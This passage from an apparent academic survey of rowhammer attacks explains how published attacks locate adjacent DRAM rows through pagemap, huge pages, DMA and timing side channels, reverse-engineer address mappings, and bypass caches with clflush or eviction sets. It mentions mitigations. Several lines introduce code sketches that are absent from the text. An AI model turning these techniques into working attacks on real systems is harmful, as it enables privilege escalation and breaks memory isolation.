4.1.2.1 Pagemap file The first attack, proposed at GoogleProject0 [1] [45], uses physical addresses directly. At [1] the vulnerability is just tested using a customized Memtest86 environment to bypass address translation. To access rows in the same bank they partially reverse engineered the addressing scheme of the Intel processor using the techniques published at [65] [66], and determined that physical addresses with an 8MB offset correspond to rows in the same bank. At Non-temporal Rowhammer [47], Curious Case of Rowhammer [54] and PFA [61] they find the base physical address directly by using the /proc/$PID/pagemap system file on Linux. This file provides a userspace process with the physical frame to which each virtual page is mapped. Since Linux 4.0, released in early 2015, this information is accessible only to privileged users, in order to hide it from possible rowhammer exploitation [67] [68]. A random approach that picks address pairs at random has also been proposed at [45]: if the rank is composed of 8 banks, a 1/8 chance of getting a row-conflict pair is achieved, and by accessing more rows at a time this probability increases. The ANVIL clflush-free technique uses the Linux /proc/$PID/pagemap utility to convert virtual addresses to physical addresses in order to work out the cache eviction set pattern.
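The pagemap lookup described above can be sketched in a few lines. This is a minimal decoding sketch assuming the documented Linux pagemap entry layout (one little-endian 64-bit entry per 4KB page, bit 63 = page present, bits 0-54 = physical frame number); the function names are our own, and on a post-4.0 kernel the file itself is readable only by privileged processes.

```python
import struct

PAGE_SIZE = 4096

def pagemap_offset(vaddr):
    """File offset in /proc/$PID/pagemap of the 8-byte entry for vaddr's page."""
    return (vaddr // PAGE_SIZE) * 8

def decode_pagemap_entry(entry_bytes, vaddr):
    """Decode one 64-bit pagemap entry into a physical address.
    Bit 63 flags the page as present; bits 0-54 hold the PFN."""
    (entry,) = struct.unpack("<Q", entry_bytes)
    if not (entry >> 63) & 1:
        return None                      # page not present in RAM
    pfn = entry & ((1 << 55) - 1)
    # Physical address = frame base + offset of vaddr inside its page.
    return pfn * PAGE_SIZE + (vaddr % PAGE_SIZE)

# Synthetic entry: a present page mapped to PFN 0x1234.
entry = struct.pack("<Q", (1 << 63) | 0x1234)
print(hex(decode_pagemap_entry(entry, 0x7F0000000123)))  # -> 0x1234123
```

On a live system one would seek to pagemap_offset(vaddr) inside /proc/self/pagemap and read 8 bytes, which is exactly the step Linux 4.0 restricted to privileged users.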

4.1.2.2 Row-conflict side channel The row-conflict side channel method is based on the fact that concurrent accesses to different rows in the same bank result in row-buffer conflicts that lead to a higher access time. Timing analysis is performed at the Curious Case of Rowhammer [54] to successfully determine the DRAM bank of the victim row. The specific attack aims to flip bits at the specific physical DRAM location in which the secret is kept, so they need to find out the bank holding it. They trigger concurrent accesses from a spy process to the DRAM banks during decryption while repeatedly measuring the access time to the DRAM. The Flip Feng Shui [42] attack relies on the row-conflict side channel for picking the hammering addresses in each row, to speed up the search for bit flips in each row. At the DRAMMER attack and the RAMpage attack [60] they propose a similar timing-based side channel to determine the row size of the DRAM chip (6.3). Also, the automatic reverse-engineering strategies presented at DRAMA [37] and One Bit Flips, One Cloud Flops [55] are based on a row-conflict side-channel attack to determine which physical address bits select the banks. The SGX-Bomb [56] has also developed an exploit based on information found using a side-channel attack. It aims to find virtual addresses within an enclave that map to the same DRAM bank. They categorize the actions in terms of timing: accessing the same row, accessing rows in different banks, and accessing rows in the same bank. The


Good go Bad attack [53] uses the row-buffer side channel to find the row address bits of the address mapping in their reverse-engineering attempt for the specific Intel Broadwell DDR4 system. The Still Hammerable [63] attack uses the random strategy of single-side rowhammer. Once again, they use the row-buffer timing side channel to find addresses that lie in different rows within the same bank, so that repeated reloads evict and clear the row buffer and reach memory directly.
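The classification logic shared by all the row-conflict side channels in this subsection can be sketched as follows. The latency values and the threshold are synthetic stand-ins for real measurements, which are platform-specific, and the helper names are hypothetical.

```python
def same_bank(latency_ns, threshold_ns=300):
    """A row-buffer conflict (two different rows, same bank) shows a
    clearly higher access latency than a row hit or an access to a
    different bank. The threshold must be calibrated per platform."""
    return latency_ns > threshold_ns

def conflicting_pairs(measurements):
    """measurements: {(addr_a, addr_b): average latency in ns}.
    Returns the pairs whose timing indicates same bank, different row."""
    return [pair for pair, t in measurements.items() if same_bank(t)]

# Synthetic measurements: conflicts ~350ns+, hits/other banks ~200ns.
measured = {("A", "B"): 360, ("A", "C"): 210, ("B", "C"): 355}
print(conflicting_pairs(measured))  # -> [('A', 'B'), ('B', 'C')]
```

In a real attack the dictionary values would come from repeatedly timing alternating accesses to each address pair with a high-resolution timer.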

4.1.3 Find Adjacent Memory Rows To trigger double-side rowhammer it is necessary to know exactly which memory rows are adjacent to the target one. Also, in order to trigger rowhammer in a more deterministic way, it is necessary to allocate and access physically contiguous memory blocks. The different proposed techniques are summarized in the following subsections.

4.1.3.1 Huge Pages Huge pages are blocks of memory that come in sizes of 4MB on x86-32, 2MB on x86-64, and 256MB on IA64. They are backed by contiguous physical addresses and are generally allocated and defined at boot time by the kernel. This feature enables the Linux kernel to manage large pages of memory to improve performance, since fewer page tables need to be accessed and maintained. The smaller number of pages reduces the overhead of memory operations and reduces the likelihood of a bottleneck during page-table access. Transparent Huge Pages (THP) is a Linux kernel feature that runs in the background and merges virtually contiguous normal pages (i.e., 4KB pages) into huge pages backed by contiguous pieces of physical memory. When the THP feature is enabled by default, the kernel attempts to satisfy a memory allocation using huge pages. If no huge page is available (due to non-availability of physically contiguous memory, for example) the kernel falls back to regular 4KB pages. When this feature is enabled it guarantees that two rows contiguous in virtual memory are also contiguous in physical memory. Although this is not as fine-grained as knowing the absolute physical address, contiguous physical rows can be accessed by using relative offsets into the huge page.  The first JavaScript attack, implemented at Rowhammer.js [3], is premised on the fact that large typed arrays are allocated 1MB-aligned, resulting in the allocation of anonymous 2MB pages for any scripting language in common browsers (Firefox 39 and Google Chrome) on Linux environments. In that case, knowing the offset in the array, the lowest 21 bits of the virtual and physical address are also known. The 2MB region of the array is divided into 16 row offsets of size 128KB (single channel). Some rows at the page borders cannot be double-hammered, as they have no neighbouring rows in the same 2MB page, but the remaining 14 row offsets can be hammered. 
 The Flip Feng Shui [42], a VM cloud server attack, also exploits the THP property, enabled by default on both host and guest. Both guest and host kernels request allocations aligning the buffer at a 2MB boundary. The buffer is backed by a huge page if the virtual address starts with "1" for the x86-64 architecture and both virtual and physical addresses have the value


zero in the lowest 21 bit positions. Thus, the start of the allocated buffer is the start of a memory row, and double-sided rowhammer can be successfully performed by accessing rows at address shifts inside the huge page. The attack relies on the KSM (Kernel Same-page Merging) feature, which merges memory pages with the same contents and does not support deduplication of huge pages. KSM prioritizes reducing the memory footprint over reducing page-table entries, breaking a huge page down into smaller pages if a small page inside it has the same contents as another page. Techniques that avoid KSM during the templating phase and retain control over which victim page maps to the vulnerable huge page must be implemented in order to obtain an efficient and reliable attack.  The rowhammer Microsoft Edge attack called Dedup Est Machina [46] implements single-side rowhammer in JavaScript to assault the Windows Edge browser. Large allocations are not backed by contiguous physical pages in Windows OS, so the CPU memory pools cannot be used to find memory pages that belong to adjacent memory rows for performing double-side rowhammer. They allocate a large array filled with doubles and then hammer 32 pages at a time by reading each page two million times.  The Throwhammer attack [59] uses the RDMA2 (Remote Direct Memory Access) ability to transfer packets efficiently and triggers the rowhammer vulnerability by accessing packets remotely on a server. Due to the remote nature of the attack, the physical addresses that map the target DMA buffer cannot be known. Fortunately, the server's Linux kernel automatically backs the RDMA buffer memory with huge pages. This provides the attacker with the opportunity to trigger double-side rowhammer remotely in a similar way to Rowhammer.js [3] and Flip Feng Shui [42]. 
 The SGX-Bomb [56] relies on the fact that the Linux SGX3 driver allocates the EPC (Enclave Page Cache) during the initialization of the enclave, and every EPC memory region is physically contiguous, allocated at boot time. In this way they are able to use the double-side rowhammer attack because the conflicting rows, found using the row-conflict side-channel attack, are mapped to sequential physical addresses in the EPC region.
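The relative-offset arithmetic used by the huge-page attacks above can be sketched as follows, assuming a 2MB huge page and the 128KB single-channel row size of the Rowhammer.js example; the helper names are ours.

```python
HUGE_PAGE = 2 * 1024 * 1024
ROW_SIZE = 128 * 1024                    # assumed single-channel row size
ROWS_PER_PAGE = HUGE_PAGE // ROW_SIZE    # 16 row offsets per huge page

def aggressor_offsets(victim_row):
    """Offsets, relative to the huge-page base, of the two aggressor rows
    around victim_row. Border rows have no neighbour inside the same huge
    page, so only the 14 interior rows can be double-hammered."""
    if not 1 <= victim_row <= ROWS_PER_PAGE - 2:
        raise ValueError("victim row has no neighbours in this huge page")
    return ((victim_row - 1) * ROW_SIZE, (victim_row + 1) * ROW_SIZE)

print(ROWS_PER_PAGE)         # -> 16
print(aggressor_offsets(1))  # -> (0, 262144)
```

Because physical contiguity inside the huge page is guaranteed, adding these offsets to the (unknown) huge-page physical base still yields physically adjacent rows, which is all double-sided hammering needs.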

4.1.3.2 Reverse engineering Different methods and techniques can be applied to reverse engineer the address mapping to the exact channel, rank and bank functions for a variety of systems.  The control signals that map physical addresses to DRAM channels, ranks and banks can be found by physically probing the memory bus and directly reading them during memory accesses. The DIMM slot exposes the metal contacts in the slits on its side, and by inserting a slim piece of metal into them physical contact can be established. Then, using a high-bandwidth oscilloscope to measure the voltage at the pin, its logic value can be deduced. Every platform needs to be measured only once: since the addressing function is learned, an

2 RDMA is direct memory access from the memory of one computer into that of another without involving either one's operating system. 3 The Intel Software Guard Extensions (SGX) is an extension to the x86 architecture that allows running an application in a completely isolated secure enclave. It includes a set of CPU instructions from Intel that allow user-level code to allocate private regions of memory, called enclaves, which are also encrypted.


attack on a similar machine does not need physical access, and the address mapping can be reconstructed for each signal individually and exactly. The drawbacks of this method are the expensive measurement equipment and the required physical access to the internals of the tested machine. The addressing functions must be linear, for example XORs of physical address bits, for this technique to be applicable. At DRAMA [37] they successfully use this method on Intel microarchitectures [69] and Sandy Bridge [70], which have linear addressing functions.  The easiest way to learn the specific address bits used for bank, channel, column, rank and row is to reverse engineer the DRAM row mapping just for the specific DDR module under attack. The disadvantage is that this does not provide a general tool that can be exploited independently of the memory technology. This approach is used at the Good go Bad attack [53], where they provide the address mapping for the Intel Broadwell processor with DDR4. They use the controller's performance counters [53] to count the number of accesses to a specific DRAM channel and bank and determine the physical address mapping. They find the row bits by analyzing the latency differences in memory accesses due to the row buffer.  An automated reverse-engineering process can run in unprivileged and possibly restricted environments by performing a timing side-channel analysis, which can be used to determine whether two physical memory addresses are mapped to the same bank. It exploits the fact that row conflicts at the row buffer lead to higher memory access times: if two addresses are located in different rows of the same bank, a longer access latency is observed. Two different algorithms have been proposed in the Proceedings of the 25th USENIX Security Symposium in 2016, DRAMA [37] and One Bit Flips, One Cloud Flops [55]. o The algorithm proposed in DRAMA [37] first creates an address pool with random addresses from a large array.
A small subset of them is tested against all others in the pool and subsequently grouped into sets having the same channel, DIMM, rank, and bank. Then the identified address sets are used to reconstruct the addressing functions. At this step they need at least a partial resolution of the tested virtual addresses to physical ones; either the availability of 2MB pages (4.1.3) or privileged information such as that provided by the /proc/pid/pagemap file (4.1.1) can be used. Now the search space is small enough to perform a brute-force search for linear functions within seconds. All linear functions that use exactly n bits as coefficients are generated and then applied to all addresses in a set, starting with n=1 and increasing n subsequently. Finally, they obtain a list of possible addressing functions that also contains linear combinations of the actual DRAM addressing functions. After selecting the functions with the lowest coefficients, the result must be verified by performing a software-based timing test. They implement this automated process for reverse engineering DRAM addressing as a tool that can be used to improve the accuracy, efficiency, and success rate of existing rowhammer attacks.


o The algorithm proposed at One Bit Flips, One Cloud Flops [55] is called the Graph-based Bit Detection Algorithm. The graph construction is based on the results produced by the LATENCY() routine, which calculates the average access latency when reading address pairs that differ only at the bit position specified as input. Each bit in a physical address is considered a node in a graph, and the relations between nodes are established using memory access latency. In the first graph, an edge connects the nodes corresponding to the bits used as input of LATENCY() whenever a high access latency is returned. The bit detection algorithm works under the assumption that the address mapping uses XOR-schemes, which is true for Intel's DRAM address mapping. From an analysis of the graph, the row and column bits can easily be detected. Memory addresses that differ only in a set of bits and show high access latency are located in different rows of the same bank; those bits are row bits and are used to select the row inside the bank. The nodes that are not row bits but produce high latency when selected together with row bits correspond to column bits. A high latency, in both cases, shows that addresses in the same bank are being accessed, so those bits cannot specify the bank index. For detecting bank bits, an undirected graph is constructed with the subset of nodes excluding those corresponding to row bits and column bits. The graph's edges connect nodes corresponding to bits that produce high-latency accesses. All connected nodes in this new graph are involved in the XOR-scheme that produces one bank bit. They used their automatic reverse-engineering tool to identify the physical address mapping in DRAMs and developed an algorithm to conduct double-side rowhammer attacks in each row of each bank. 
The DRAM mappings of 6 different processors (Intel Xeon E5620, Intel Core i3-2120, Intel Core i5-2500, Intel Xeon E5-1607v3, Intel Xeon E5-1670v3 and Intel Core i5-5300U) show that some of the 12 least significant address bits are bank bits, which means that a 4KB page is not always mapped to the same row. They design a data structure to represent memory blocks in the same row using the cache-aligned memory blocks that are kept in the same row. The data structure is a 3-dimensional array: the first dimension represents the bank index, the second the row index, and the third stores an array of memory units mapped to the same row. The second method [55] searches for XOR-schemes without needing to check the complex logic behind them and without any privileged information regarding the memory. On the other hand, the first method [37] takes less time to reverse engineer the DRAM mapping, around 2 minutes compared with 20 minutes for the second method, and can handle more complex DRAM memory mapping schemes.
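The brute-force step of the DRAMA-style search described above can be sketched as follows: generate candidate XOR masks of up to n physical-address bits and keep those whose parity is constant inside every same-bank address set. The ground-truth mapping here is synthetic (a single bank bit computed as the XOR of address bits 13 and 16), chosen only to make the sketch self-contained and testable.

```python
import random
from itertools import combinations

def parity(x):
    return bin(x).count("1") & 1

def candidate_masks(addr_sets, bits=range(6, 20), max_n=2):
    """Return XOR masks (bit combinations) whose parity is constant
    inside every address set -- the brute-force search over linear
    functions, starting with n=1 bits and increasing n."""
    found = []
    for n in range(1, max_n + 1):
        for combo in combinations(bits, n):
            mask = sum(1 << b for b in combo)
            if all(len({parity(a & mask) for a in s}) == 1 for s in addr_sets):
                found.append(mask)
    return found

# Synthetic ground truth: bank bit = XOR of physical address bits 13 and 16.
truth = lambda a: parity(a & ((1 << 13) | (1 << 16)))
random.seed(0)
addrs = [random.getrandbits(30) for _ in range(256)]
sets = [[a for a in addrs if truth(a) == v] for v in (0, 1)]
print([hex(m) for m in candidate_masks(sets)])  # -> ['0x12000'] (bits 13^16)
```

Real DRAM mappings use several such functions at once (one per bank-address bit), and the surviving candidates must still be verified by a timing test, as the text notes.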

4.1.3.3 DMA The DMA (Direct Memory Access) (2.8.1) memory management mechanism provides the Android OS with an ION API that allows the user to access uncached physical memory.


 The DRAMMER attack [2] reserves memory blocks at the SYSTEM_CONTIG ION heap, which allocates physically contiguous memory via kmalloc(). kmalloc() resorts directly to the buddy allocator (2.8) for physically contiguous chunks at least as large as the requested one. The attacker controls the aggressor rows to perform double-side hammering by controlling the row offsets inside the contiguously allocated block.  The kmalloc-backed SYSTEM_CONTIG heap has since been disabled for userland apps, removing the attacker's primitive to allocate contiguous memory and preventing the DRAMMER attack [2]. The November 2016 Android security update also includes a second mitigation proposed by Google that reduces the maximum pool size to 64KB, making it more likely to obtain fragmented memory pieces that are not physically contiguous. The new attack proposed by the same research group to bypass these countermeasures is called RAMpage [60]. They use the ION SYSTEM heap, which is still available but provides memory blocks that are not guaranteed to be physically contiguous and come from different memory zones. The buddy allocator behaves predictably, providing contiguous memory pages directly to ION's internal pools; hence there is in practice a high probability of getting contiguous physical memory that can be used to trigger a double-side rowhammer attack. To guarantee reserving memory in the lowmem zone, in which the sensitive data is allocated, they simply exhaust the highmem zone first. Lastly, they confirm that the allocated chunks are contiguous either by triggering double-side rowhammer and checking for bit flips, or by using the bank-conflict side channel proposed in GLitch [57] [58] (4.1.3.4).

4.1.3.4 Row-conflict side channel for detecting contiguous memory: The GLitch rowhammer attack [57] [58] is based on a timing side-channel attack that can leak information about the state of the physical memory. This information is used to detect physically contiguous memory allocations directly from JavaScript. The attack relies on the timing increase due to the row-buffer conflict when two rows of the same bank are accessed. First of all, they are able to allocate contiguous memory on the Adreno GPU by using the alloc_page() macro, which queries the buddy allocator (2.7) for single pages. In order to obtain physically contiguous memory they need to exhaust all the memory from order 0 up to n. The order n must satisfy the constraint of 3 consecutive rows to perform double-side rowhammer. For the example of the Snapdragon 800/801 chipset with 64KB row alignment, which means 16 pages per row, allocations of order 6 are necessary to cover 64 (2^6) contiguous pages, which span over 4 complete rows. In the second place, they detect the contiguous area using a timing side-channel tool that measures differences between row hits (the accessed row is already in the row buffer) and row conflicts (the row buffer must be flushed to hold the newly accessed row) in order to deduce the order of the underlying allocation. They heuristically identify the allocation order by studying the mean access time of a hit pattern. The hit pattern is composed of 15 of the 16 pages of a full row and is run for each page within 512KB, so an allocation of order at least 4, which corresponds to a block of size 64KB (the row size), can easily be detected.
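The buddy-allocator order arithmetic in the Snapdragon 800/801 example above can be sketched in a few lines; the helper name is ours, and the constants restate the figures given in the text (4KB pages, 64KB rows, 3 consecutive rows needed for double-sided hammering).

```python
def min_order(pages_needed):
    """Smallest buddy-allocator order n such that a 2**n-page block is
    at least pages_needed pages long."""
    n = 0
    while (1 << n) < pages_needed:
        n += 1
    return n

PAGE = 4096
ROW_BYTES = 64 * 1024               # Snapdragon 800/801 row alignment
PAGES_PER_ROW = ROW_BYTES // PAGE   # 16 pages per row
ROWS_NEEDED = 3                     # one victim plus two aggressor rows

order = min_order(ROWS_NEEDED * PAGES_PER_ROW)
print(order, (1 << order) // PAGES_PER_ROW)  # -> 6 4
```

An order-6 block is 64 pages, i.e. 4 complete 64KB rows, matching the figure quoted in the text; 3 rows (48 pages) already force order 6 because order 5 only yields 32 pages.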


4.2 FAST UNCACHED DIRECT DRAM ACCESS The attacker must access the DRAM chip fast enough to trigger the rowhammer bug. The main challenge is bypassing the CPU caches (2.3) to make sure that every memory access propagates to the DRAM. Various methods have been used to bypass, flush or nullify all levels of cache in order to gain direct access to the physical memory: the attacker needs to either flush the CPU cache or use uncached DMA memory to bypass the CPU caches altogether. The various techniques are summarized in this section (Table 7).

Uncached Direct DRAM Access Techniques: clflush | Eviction Set | Cache | Non-Temporal | DMA

GoogleProject0 ✓
Non-Temporal Rowhammer ✓
Curious case of Rowhammer ✓ ✓
Dedup Est Machina ✓
Flip Feng Shui ✓
One bit flip, one cloud flop ✓
DRAMMER ✓
SGX-Bomb ✓
Another Flip in the Wall ✓
GLitch ✓
Throwhammer ✓
RAMpage ✓
PFA ✓
Nethammer ✓ ✓
Still Hammerable ✓
Rowhammer.js ✓
DRAMA ✓
ANVIL ✓
Good go Bad ✓

Table 7 Various techniques used to access the DRAM directly

4.2.1 Explicit cache flush The first method directly uses the CLFLUSH instruction, available from userspace (userland) on x86 architectures [1] [71], in attacks such as GoogleProject0 [45], One Bit Flips, One Cloud Flops [55] and PFA [61]. In addition, an open-source rowhammer test relying on the clflush instruction for x86-32 and x86-64 can be found in the Google repository on GitHub [72]. The clflush instruction flushes the cache entries associated with a given address from all cache levels. It must be executed between subsequent read operations on the same address to guarantee that each access reaches the DRAM.


The cross-VM rowhammer paper [55] tests the effect of an additional mfence instruction before entering the next loop, to force clflush to take effect before the next access. They find that rowhammer without mfence is more effective than with it when double-side rowhammer is used: ensuring that all memory accesses reach the memory slows down program execution, reducing the effectiveness of the rowhammer attack. The Flip Feng Shui [42] implementation relies on a variant of the double-side rowhammer proposed at GoogleProject0 [45], which uses the clflush instruction to evict the CPU cache between memory accesses. The SGX-Bomb [56] uses the clflushopt assembly instruction to invalidate the specified linear address from every level of the cache hierarchy, avoiding the CPU cache between memory accesses. The Nethammer [62] proves that bit flips can be induced using a non-default network driver implementation that uses clflush while processing a network packet, on an Intel i7-6700K CPU. They managed to flip bits remotely just by sending UDP packets. The Still Hammerable [63] approach performs clflush between read accesses and executes an mfence to ensure that the flush operation has finished while triggering the one-location rowhammer method. On the other hand, the Curious Case of Rowhammer [54] uses the clflush instruction to identify the DRAM bank by implementing a row-buffer side-channel attack. The clflush instruction can be executed even by a non-privileged process on the x86 architecture. One of the first rowhammer mitigation strategies therefore involved restricting access to the clflush instruction: for example, Google updated the NaCl sandbox's x86 validator to disallow the CLFLUSH instruction (tracked as CVE-2015-0565), preventing the loading of any code containing that instruction [45].

4.2.2 Cache Eviction sets New and different eviction strategies have been proposed as a replacement for the clflush instruction. The aim of such strategies is to find an eviction set that contains addresses belonging to the same cache set as the aggressor rows. A cache eviction set is defined as a set of congruent addresses, where two addresses are congruent if and only if they map to the same cache set. The addresses that belong to the same congruence set as our aggressor row make up the cache eviction set. The eviction of the aggressor address's data from the cache is forced by accessing, one after the other, every address belonging to the eviction set. We summarize in this section all the methods to find an eviction set that have been published to date.
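The congruence notion above can be illustrated with a toy physically indexed cache model. The set count and associativity here are hypothetical; a real last-level cache additionally hashes the address into slices with an undocumented function, which is exactly what makes finding eviction sets hard in practice.

```python
LINE_SIZE = 64
N_SETS = 2048                  # hypothetical number of cache sets
ASSOCIATIVITY = 12             # 12-way: 12+ congruent accesses force eviction

def cache_set(addr):
    """Set index of a simple physically indexed cache: the bits just
    above the 6 line-offset bits select one of N_SETS sets."""
    return (addr // LINE_SIZE) % N_SETS

def eviction_set(target, pool):
    """Addresses from pool congruent with target (same cache set)."""
    s = cache_set(target)
    return [a for a in pool if a != target and cache_set(a) == s]

target = 0x123440
stride = LINE_SIZE * N_SETS    # addresses one stride apart are congruent
pool = [target + i * stride for i in range(1, ASSOCIATIVITY + 2)]
es = eviction_set(target, pool)
print(len(es), all(cache_set(a) == cache_set(target) for a in es))  # -> 13 True
```

Accessing all 13 congruent addresses in turn would evict the target line from a 12-way set under an LRU-like policy, which is the role the eviction set plays as a clflush replacement.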

4.2.2.1 CPU Cache evictions The process of finding an efficient eviction set that can be used to implement a rowhammer attack [49] confronts significant challenges. In the first place, one must generate at least as many conflicting memory accesses as the last-level cache associativity, which is high (8-way or 16-way) in modern processors. In addition, the replacement policies used in real hardware are not publicly disclosed. Reverse-engineering research has found the complex address

functions that determine congruence in the cache (2.3), but this still leaves the non-trivial problem of finding access sequences that achieve high eviction rates at low execution time. Moreover, the replacement policy influences the number and the pattern of accesses needed for a specific eviction strategy. Finally, extra challenges arise when the mapping of an address to a cache set is done via the physical address, because the mapping algorithm is not publicly disclosed and user-level applications may not have access to the virtual-to-physical memory mapping.  The ANVIL [49] researchers demonstrate a clflush-free rowhammer attack on a laptop with an Intel Core i5-2540M (Sandy Bridge) processor and a 4GB DDR3 DRAM module. They do not mount an end-to-end attack; instead, they present an algorithm for triggering bit flips without clflush and propose a software-based protection against rowhammer called ANVIL. They present a methodology for finding an eviction set for a specific architecture. As a first step, they study the target CPU cache architecture: in this case the processor has three cache levels and the last level is an inclusive, shared, physically indexed 12-way cache. For an inclusive cache, evicting the word from the last level is enough to bypass the whole cache hierarchy, so just 13 addresses are necessary to compose the eviction set. They must also find the memory address mapping for the specific microarchitecture (2.3). Then they can create an eviction set by first picking the aggressor address and then using its physical address to find 12 more addresses that match the cache set mapping. Furthermore, they generate a high miss-rate pattern that cyclically accesses the 13 addresses, using performance counters to determine whether each access was a cache hit or a miss. Finally, they achieve a time-efficient memory access pattern by always driving the aggressor address to the least-recently-used position in the replacement state.
To implement a CLFLUSH-free double-sided rowhammer attack, they repeat the access pattern over the aggressor rows 110K times in order to produce a bit flip in the victim row.  Rowhammer.js [3] is a scripting-language-based attack that can be triggered remotely through web browsers. It describes an algorithm to find an optimal eviction strategy for an unknown cache replacement policy. The goal is an eviction set that can replace the clflush instruction when triggering the rowhammer vulnerability and that is effective for both pseudo-LRU and adaptive replacement policies without significant timing overhead. Their adaptive eviction strategy algorithm finds an eviction set by performing a timing attack, regardless of the replacement policy. The cached(p) method tries to evict address p with the current eviction set and decides, based on the access time, whether the access was cached. In the first step, the algorithm continuously adds addresses to the eviction set until the eviction of the target physical address can be clearly measured. Secondly, it replaces all accessed addresses that have no influence on the eviction with addresses that do, in order to minimize the number of distinct addresses in the eviction set. In the final step, it randomly removes all addresses that have no influence on the eviction.  In Dedup Est Machina [46] an end-to-end JavaScript-based attack against the Microsoft Edge browser is presented. They use a cache reduction algorithm similar to the one in [3] to find minimal eviction sets in a fraction of a second. They have achieved a


faster algorithm by investigating the specific way Windows hands out physical pages: addresses that are 128KB apart are often in the same cache set in Windows. They include this property in their algorithm to quickly find cache eviction sets for the memory locations they intend to hammer.  A software-driven fault attack on public-key exponentiation, induced by flipping a bit in the secret, is presented in the Curious Case of Rowhammer paper [54]. The first attack step aims to determine the cache set to which the secret exponent maps. They devise a PRIME+PROBE methodology to learn the cache slice function using [73] and then identify the target cache set and slice that collide with the secret. On their Intel test machine, with an LLC of 12-way associativity (k) and 4 cache slices (m), they must probe 2048 sets. Each set is targeted one after another: the attacker primes a set with elements from the eviction set, then allows the decryption to happen (the victim row is accessed), and finally observes the timing required to access selected elements from the set. Accessing only k × m addresses may not be enough to guarantee the eviction of the cache line [3], so they also present an alternative strategy based on the approach of [3].  The Another Flip in the Wall attack [43] presents a technique called replacement-aware page cache eviction to deterministically evict a page from the cache. It aims to avoid the memory-exhaustion techniques used in previous rowhammer attacks, which risk crashing the system. Their eviction set uses only cache pages that are not visible in the system memory utilization; such pages can be evicted at any time without the system running out of memory. They also use mincore, which reports whether a given page is resident in the cache, so the replacement-aware page cache eviction can be aborted as soon as the target page is evicted.
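The residency check used to abort the eviction early can be sketched with the Linux mincore() interface; this is an illustrative snippet, not code from [43]:

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* mincore() fills one status byte per page of the queried range; bit 0
 * of each byte indicates whether the page is resident in memory.
 * addr must be page-aligned. Returns 1 if resident, 0 if not, -1 on error. */
static int page_is_resident(void *addr)
{
    unsigned char vec;
    if (mincore(addr, 1, &vec) != 0)  /* length is rounded up to one page */
        return -1;
    return vec & 1;
}
```

Polling this predicate after each eviction step lets an attacker stop as soon as the target page has left memory, avoiding needless memory pressure.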
 The Good go Bad [53] technique aims to find the cache slice mapping in order to devise an access pattern that evicts the aggressor addresses. They generate sets of potentially conflicting random physical addresses and apply timing-based side-channel analysis to find the bits used in cache set and slice selection. They exhaustively search over the collected conflicting address pairs to find the unique XOR combination used for cache slice selection. The most remarkable aspect of their technique is that they abuse CAT technology 4 to reduce the number of accesses (and hence the time) required to produce conflicting cache misses. In fact, their experiments show that on a CAT-enabled processor with a 1-way LLC assigned to each core, generating conflict-set misses is more efficient than CLFLUSH-based attacks, reducing the time to flip a bit by more than half. This advantage allows triggering bit flips with rowhammer even at double the refresh rate.  Nethammer [62] exploits the CAT technology of Intel Xeon processors to remotely flip bits on a system just by sending UDP packets. If the CAT-enabled processor limits the number of cache ways to a single one for the code that handles the processing of UDP packets, the eviction of the

4 Cache Allocation Technology (CAT) has been developed by Intel with the aim of enabling more control over the LLC and over how cores allocate into it. The system administrator can force individual cores to allocate only into reserved ways of the cache by assigning a class of service to each core. Each core is then limited to allocating, and therefore evicting, cache lines from its specific subset.


cache is faster. If a function is called multiple times for one packet, its address is likely accessed and loaded repeatedly from the specific DRAM location that is being hammered. Most of the previous attacks base their cache eviction search on precisely measuring data access times; a key challenge is being able to build a precise timer, as it is in side-channel attacks.
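The set-reduction idea that these eviction strategies share can be illustrated against a toy cache model. The snippet below is a sketch, not code from any of the cited papers: a simulated W-way LRU set plays the role of the timing oracle cached(p), and every candidate whose removal still evicts the target is dropped, leaving a minimal eviction set:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NSETS 64   /* illustrative cache geometry */
#define WAYS   8
#define LINE  64

static uint64_t tags[NSETS][WAYS];  /* tags[s][0] is most recently used */
static int      fill[NSETS];

static void cache_reset(void)
{
    for (int s = 0; s < NSETS; s++) fill[s] = 0;
}

static void cache_access(uint64_t addr)
{
    uint64_t line = addr / LINE;
    int s = (int)(line % NSETS);
    for (int i = 0; i < fill[s]; i++) {
        if (tags[s][i] == line) {                /* hit: move to MRU */
            for (; i > 0; i--) tags[s][i] = tags[s][i - 1];
            tags[s][0] = line;
            return;
        }
    }
    int n = fill[s] < WAYS ? fill[s] : WAYS - 1; /* miss: drop the LRU line */
    for (int i = n; i > 0; i--) tags[s][i] = tags[s][i - 1];
    tags[s][0] = line;
    if (fill[s] < WAYS) fill[s]++;
}

static int cache_contains(uint64_t addr)
{
    uint64_t line = addr / LINE;
    int s = (int)(line % NSETS);
    for (int i = 0; i < fill[s]; i++)
        if (tags[s][i] == line) return 1;
    return 0;
}

/* Oracle: does accessing every candidate evict the target?  A real
 * attack replaces this with a timed reload of the target. */
static int evicts(uint64_t target, const uint64_t *cand, size_t n)
{
    cache_reset();
    cache_access(target);
    for (size_t i = 0; i < n; i++) cache_access(cand[i]);
    return !cache_contains(target);
}

/* Greedy reduction: drop every address whose removal still evicts the
 * target; the survivors form a minimal eviction set (WAYS congruent
 * addresses for this LRU model). Returns the reduced size. */
static size_t reduce(uint64_t target, uint64_t *cand, size_t n)
{
    for (size_t i = 0; i < n; ) {
        uint64_t saved = cand[i];
        cand[i] = cand[n - 1];          /* try the set without cand[i] */
        if (evicts(target, cand, n - 1)) {
            n--;                        /* not needed: drop it */
        } else {
            cand[i] = saved;            /* needed: keep it and move on */
            i++;
        }
    }
    return n;
}
```

In a real attack, evicts() is a timing measurement and the candidates are virtual addresses; the reduction logic stays the same regardless of the replacement policy, which is the core observation of [3].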

4.2.2.2 GPU Cache Evictions

